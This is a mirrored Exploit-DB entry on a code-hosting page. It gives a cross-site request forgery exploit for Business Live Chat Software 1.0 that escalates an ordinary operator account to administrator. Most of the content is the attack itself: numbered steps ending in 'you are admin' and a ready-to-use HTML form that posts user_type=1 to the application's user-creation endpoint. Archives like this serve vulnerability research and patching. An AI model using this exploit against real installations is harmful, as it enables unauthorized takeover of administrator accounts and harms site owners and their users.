bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48141.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.2 KiB
Text
Raw Permalink Blame History

# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
# Description: Operator Can Change Role User Type to admin
# Date: 2020-02-26
# Exploit Author: Meisam Monsef
# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php
# Version: V-1.0
# Tested on: ubuntu
Exploit :
1 - please login or create account
2 - open exploit.html in browser
3 - change you user id input for Change Role User Type to admin
4 - fill input data (fname - lname - email)
5 - click Update Button
6 - logout account
7 - login again you are admin & Enjoying
<form action="https://TARGET/admin/user/users/create"
enctype="multipart/form-data" method="post" accept-charset="utf-8">
user_id :
<input type="text" name="user_id" value="1"> <!-- change your user_id -->
<br>
fname :
<input type="text" name="fname" value="" /> <!-- fill your first name -->
<br>
lname :
<input type="text" name="lname" value="" /> <!-- fill your last name -->
<br>
email :
<input type="text" name="email" value="" /> <!-- fill your email -->
<br>
user_type :
<input type="text" name="user_type" value="1" />
<br>
status :
<input type="text" name="status" value="1" />
<br>
<button type="submit">Update</button>
</form>
Reference in a new issue View git blame Copy permalink